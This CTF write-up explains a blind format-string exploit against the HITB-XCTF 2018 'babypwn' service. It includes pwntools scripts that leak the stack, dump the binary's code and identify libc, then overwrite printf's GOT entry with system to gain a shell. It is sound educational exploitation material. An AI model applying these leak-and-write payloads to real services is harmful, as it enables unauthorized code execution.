HITB-XCTF GSEC 2018 Quals: babypwn - Blind Format String Exploitation

By David Buchanan, 13th April 2018

The only information provided with this challenge was an IP address and port number. No binaries to download! Of course, my first idea was to use netcat to see what it did.

$ nc 47.75.182.113 9999
hello
hello
%08x
00000000

Typing hello just resulted in the same input being echoed back. There are only so many possibilities for this kind of challenge, so I thought I'd check if format strings did anything. I entered %08x, and sure enough the server responded with 00000000, demonstrating that the server was passing user input to printf or a similar function as the format string.

Next, I performed some recon. I wrote a simple script to dump the contents of the stack.

from pwn import *

chal = remote("47.75.182.113", 9999)

# Print positional argument i as a zero-padded 64-bit hex value.
for i in range(1, 512):
    chal.sendline("%{}$016lx".format(i))
    print(chal.recvn(16))

Here's a shortened version of the output from two consecutive runs, side by side, along with some annotations I added:

First run:          Second run:

0000000000000000    0000000000000000
0000000000000000    0000000000000000
00007f40930892f0    00007f34706a42f0 <- libc pointer
00007f4093383780    00007f347099e780
00007f40935aa700    00007f3470bc5700
786c363130243625    786c363130243625 <- My format string input
00007fff9e520000    00007ffce58bb700
0000000000000000    0000000000000000
00007fff9e520080    00007ffce58bb720
000000006562b026    000000006562b026
00007f4093149627    00007f3470764627
00000000ffffffff    00000000ffffffff
00007f40935ae718    00007f3470bc9718
00007fff9e595280    00007ffce591a280
00007f40935ae700    00007f3470bc9700
00007fff9e520001    00007ffce58bb701
000108882879431a    0001094ab0b7ba64
0000000000000000    0000000000000000
0000000000000000    0000000000000000
0000000000000000    0000000000000000
0000000000000000    0000000000000000
0000000000000000    0000000000000000
0000000000000000    0000000000000000
00007fff9e520258    00007ffce58bb8f8
0000000000000000    0000000000000000
0000000000000001    0000000000000001
00007fff9e520258    00007ffce58bb8f8
0000000000000001    0000000000000001
00007fff9e520180    00007ffce58bb820
00007f40935ae168    00007f3470bc9168
0000000000f0b5ff    0000000000f0b5ff
0000000000000001    0000000000000001
000000000040076d    000000000040076d <- A return address that points into
00007fff9e52015e    00007ffce58bb7fe    the .text segment of the program
0000000000000000    0000000000000000    (presumably)
0000000000400720    0000000000400720
00000000004005a0    00000000004005a0

From this we can gather that the program is likely dynamically linked with libc, ASLR is on (the libc addresses are different each time), but PIE is off (the .text segment addresses are the same each time).

Since PIE is off, the executable segment likely starts at 0x400000, the default load address for non-PIE x86-64 Linux binaries.
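The reasoning above can be sketched as a small classifier over a few rows copied from the dump. This is a rough illustration in Python 3 using only the standard library; the classify helper and its address ranges are my own heuristics for a typical x86-64 Linux layout, not something taken from the challenge.

```python
import struct

# (first run, second run) pairs copied from the dump above.
rows = [
    (0x00007f40930892f0, 0x00007f34706a42f0),
    (0x786c363130243625, 0x786c363130243625),
    (0x00007fff9e520080, 0x00007ffce58bb720),
    (0x000000000040076d, 0x000000000040076d),
    (0x0000000000400720, 0x0000000000400720),
]

def classify(value):
    """Rough guess at what a leaked 64-bit word is (heuristic, not proof)."""
    raw = struct.pack("<Q", value)
    if all(0x20 <= b < 0x7f for b in raw):
        # Eight printable bytes: most likely our own input, read little-endian.
        return "ascii " + repr(raw.decode("ascii"))
    if 0x400000 <= value < 0x500000:
        return "non-PIE binary"
    if value >> 40 == 0x7f:
        # Assumption: the stack sits at the very top of user space
        # (0x7ffc..., 0x7fff...), shared libraries somewhat below it.
        return "stack" if value >> 36 >= 0x7ff else "shared library"
    return "unknown"

for first, second in rows:
    stable = "same" if first == second else "differs"
    print("%016x  %-8s %s" % (first, stable, classify(first)))
```

Values that differ between runs are randomised by ASLR, and values that stay the same point into the fixed-address binary. The word 786c363130243625 decodes to the string %6$016lx, which shows that the input buffer itself is positional argument 6.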

With this information in mind, I wrote a script to dump the program code:

from pwn import *

chal = remote("47.75.182.113", 9999)

base = 0x400000
leaked = ""

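while 1:
    addr = p64(base+len(leaked))
    # The server treats "\n" as end of input, so an address containing it
    # can't be sent; record a placeholder byte and move on.
    if "\n" in addr:
        leaked += "\0"
        print("derp")
        continue
    # The input buffer starts at argument 6 and the address sits 16 bytes in,
    # so %8$s dereferences it. The A/B markers delimit the leaked string.
    chal.sendline("A"*6 + "%8$s" + "B"*6 + addr)
    chal.recvuntil("A"*6)
    leak = chal.recvuntil("B"*6)[:-6]
    # %s stops at a null byte, so each leak is followed by one in memory.
    leaked += leak + "\0"
    print(leak)
    with open("leak.bin", "wb") as l:
        l.write(leaked)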

The script skips any address containing "\n", because the server appeared to use it to delimit lines of input, so the payload would be cut short. Since %s stops printing at the first null byte, the script appends "\0" after each leak and resumes from the following address. I left this program running for a couple of minutes, and dumped the first ~2 kB of the .text segment.
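To show why the payload uses %8$s and how the dump reassembles memory from null-terminated reads, here is a minimal offline sketch in Python 3 using only the standard library. It does not talk to the server: read_c_string is a hypothetical stand-in for the remote %s leak, and the fake memory contents are invented for the example.

```python
import struct

BUF_ARG = 6  # the stack dump showed the input buffer at positional argument 6

def build_leak_payload(addr):
    """Lay out 'AAAAAA%8$sBBBBBB' followed by the target address."""
    prefix = b"A" * 6 + b"%8$s" + b"B" * 6
    assert len(prefix) % 8 == 0            # address must land on an 8-byte slot
    assert BUF_ARG + len(prefix) // 8 == 8  # 16 bytes in -> argument 8
    return prefix + struct.pack("<Q", addr)

def read_c_string(memory, base, addr):
    """Stand-in for the remote %s: bytes from addr up to the next NUL."""
    start = addr - base
    end = memory.find(b"\x00", start)
    if end == -1:
        end = len(memory)
    return memory[start:end]

def dump(memory, base):
    """Rebuild memory from repeated string reads, like the script above."""
    leaked = b""
    while len(leaked) < len(memory):
        addr = base + len(leaked)
        if b"\n" in struct.pack("<Q", addr):
            leaked += b"\x00"              # unsendable address: placeholder byte
            continue
        leaked += read_c_string(memory, base, addr) + b"\x00"
    return leaked[:len(memory)]

# Invented memory image for the demonstration.
fake = b"\x7fELF\x02\x01\x01" + b"\x00" * 5 + b"code" + b"\x00\x00" + b"data\x00"
print(dump(fake, 0x400000) == fake)
```

The placeholder is only correct when the skipped byte really is zero, as it is in this fake image. A read that has to start at an address containing 0x0a is replaced by a zero byte, so a longer dump can contain small holes there.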

I loaded this dump up in IDA and took a look.

Although the symbol table was part of the data I dumped, it wasn't enough for IDA to import automatically, so I had to name things myself.

The program sits in a loop, reading input onto the stack with gets() and printf'ing it. Although gets() can overflow the stack buffer, the function never returns, so an overwritten return address is never used and a plain stack smash isn't exploitable.

I decided that the easiest path to exploitation was to replace printf in the GOT with a pointer to system, effectively converting the program into a system(gets()) loop. But first, I needed to find the address of printf's GOT entry, which is easy because we can just look at the PLT in IDA: it is 0x601020 (got_printf in my final exploit code below).

Next, we need to work out where system is. To do this, I used format strings to leak the GOT entries for a few different functions (see my final exploit code below), and then fed the information into https://libc.blukat.me/ (a very useful tool!). This revealed that the libc version being used by the server was libc6_2.23-0ubuntu10_amd64.so.
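The idea behind the lookup is that every symbol sits at a fixed offset from the libc base, and the base is page-aligned, so the low 12 bits of each leaked address survive ASLR. Below is a minimal sketch of that consistency check in Python 3. The offsets and the base address are HYPOTHETICAL values made up for illustration (the real ones come from the identified libc file), and libc_base is my own helper name.

```python
PAGE_MASK = 0xFFF

# HYPOTHETICAL symbol offsets, invented for this example only.
offsets = {
    "setbuf": 0x12340,
    "gets":   0x23450,
    "usleep": 0x34560,
    "system": 0x45670,
}

def libc_base(leaks, offsets):
    """Return the base implied by the leaks, or None if they disagree."""
    bases = {leaks[name] - offsets[name] for name in leaks}
    if len(bases) != 1:
        return None                      # symbols point at different bases
    base = bases.pop()
    return base if base & PAGE_MASK == 0 else None

# Pretend these three addresses were leaked from the GOT (hypothetical base).
assumed_base = 0x7f4093000000
leaks = {name: assumed_base + offsets[name] for name in ("setbuf", "gets", "usleep")}

base = libc_base(leaks, offsets)
print(hex(base), hex(base + offsets["system"]))
```

If a candidate libc gives different bases for different symbols, or a base that is not page-aligned, it is the wrong version. The asserts in the final exploit perform the same check.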

Then all I had to do was write a quick format string generator, and there you have it:

from pwn import *

libc = ELF("libc6_2.23-0ubuntu10_amd64.so")

# derived from leaked .text section
got_setbuf = 0x601018
got_printf = 0x601020
got_gets   = 0x601028
got_usleep = 0x601030

chal = remote("47.75.182.113", 9999)

def leak_addr(addr):
    print("Leaking...")
    chal.sendline("%8$s" + "\0"*12 + p64(addr))
    return u64(chal.recvn(6) + "\0\0")

libc_setbuf = leak_addr(got_setbuf)
libc_gets = leak_addr(got_gets)
libc_usleep = leak_addr(got_usleep)

log.info("libc_setbuf = " + hex(libc_setbuf))
log.info("libc_gets   = " + hex(libc_gets))
log.info("libc_usleep = " + hex(libc_usleep))

# calculate libc base address (ASLR)
libc.address = libc_setbuf - libc.sym["setbuf"]

log.info("libc base   = " + hex(libc.address))

# double check we have the correct libc version
assert(libc.sym["gets"] == libc_gets)
assert(libc.sym["usleep"] == libc_usleep)

# now we will overwrite got_printf with libc.sym["system"]

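nwritten = 0
payload = ""
addrs = ""
offset = 16  # 8-byte slots reserved for the format string, before the addresses
# write the low 6 bytes of system's address one byte at a time with %hhn
for index, byte in enumerate(bytearray(p64(libc.sym["system"])[:6])):
    addrs += p64(got_printf+index)
    # pad so the running count matches the byte (mod 256); the +16 keeps
    # the width above anything %x prints on its own
    num_needed = ((byte - nwritten - 16) & 0xFF) + 16
    payload += "%1${}x%{}$hhn".format(num_needed, 6+offset+index)
    nwritten += num_needed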

assert(len(payload) <= offset*8)

payload += "\0"*((offset*8)-len(payload))
payload += addrs

assert("\n" not in payload)

chal.sendline(payload)
chal.sendline("/bin/sh")

chal.interactive()

Although pwntools does have its own format string generator, I couldn't get it to work ¯\(ツ)/¯.

The flag was HITB{Baby_Pwn_BabY_bl1nd}

Finally, I dumped the program binary, so now you can run it offline: babypwn

A quick note on how the format string exploit works:

According to man 3 printf, the %n formatter means

"The number of characters written so far is stored into the integer pointed to by the corresponding argument."

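We can abuse this by putting arbitrary pointers on the stack, printing a controlled number of bytes, and then using a %n to get an arbitrary write. My exploit uses the %hhn variant, which stores only the low byte of the count, so each byte of the target can be written separately. If you want a more detailed explanation, google it :P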
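To make the %hhn arithmetic concrete, here is a minimal sketch in Python 3 using only the standard library (not pwntools). It rebuilds the same payload layout as my exploit and replays it with a toy simulate function, which assumes each %1$Nx prints exactly N characters. build_payload, simulate and the example system address are hypothetical, chosen only for illustration.

```python
import re
import struct

BUF_ARG = 6      # positional argument where the input buffer starts
PAD_SLOTS = 16   # 8-byte slots reserved for the format text ("offset" above)

def build_payload(target, value, nbytes=6):
    """Write the low nbytes of value to target, one byte per %hhn."""
    fmt = b""
    addrs = b""
    written = 0
    for i, byte in enumerate(struct.pack("<Q", value)[:nbytes]):
        # Bring the running count to `byte` modulo 256, printing at least 16.
        count = ((byte - written - 16) & 0xFF) + 16
        fmt += b"%%1$%dx%%%d$hhn" % (count, BUF_ARG + PAD_SLOTS + i)
        addrs += struct.pack("<Q", target + i)
        written += count
    assert len(fmt) <= PAD_SLOTS * 8
    return fmt.ljust(PAD_SLOTS * 8, b"\x00") + addrs

def simulate(payload):
    """Replay the payload roughly as printf would; returns {address: byte}."""
    text = payload.split(b"\x00", 1)[0]     # printf stops at the first NUL
    memory = {}
    written = 0
    for width, arg in re.findall(rb"%1\$(\d+)x%(\d+)\$hhn", text):
        written += int(width)
        slot = (int(arg) - BUF_ARG) * 8     # byte offset of that argument
        (addr,) = struct.unpack_from("<Q", payload, slot)
        memory[addr] = written & 0xFF       # %hhn keeps only the low byte
    return memory

got_printf = 0x601020
fake_system = 0x7f4093045390                # hypothetical address
result = simulate(build_payload(got_printf, fake_system))
print(bytes(result[got_printf + i] for i in range(6)).hex())
```

The null padding works because gets() copies the whole line onto the stack, while printf stops interpreting the format at the first null byte. The addresses therefore sit at a known argument index without ever being printed.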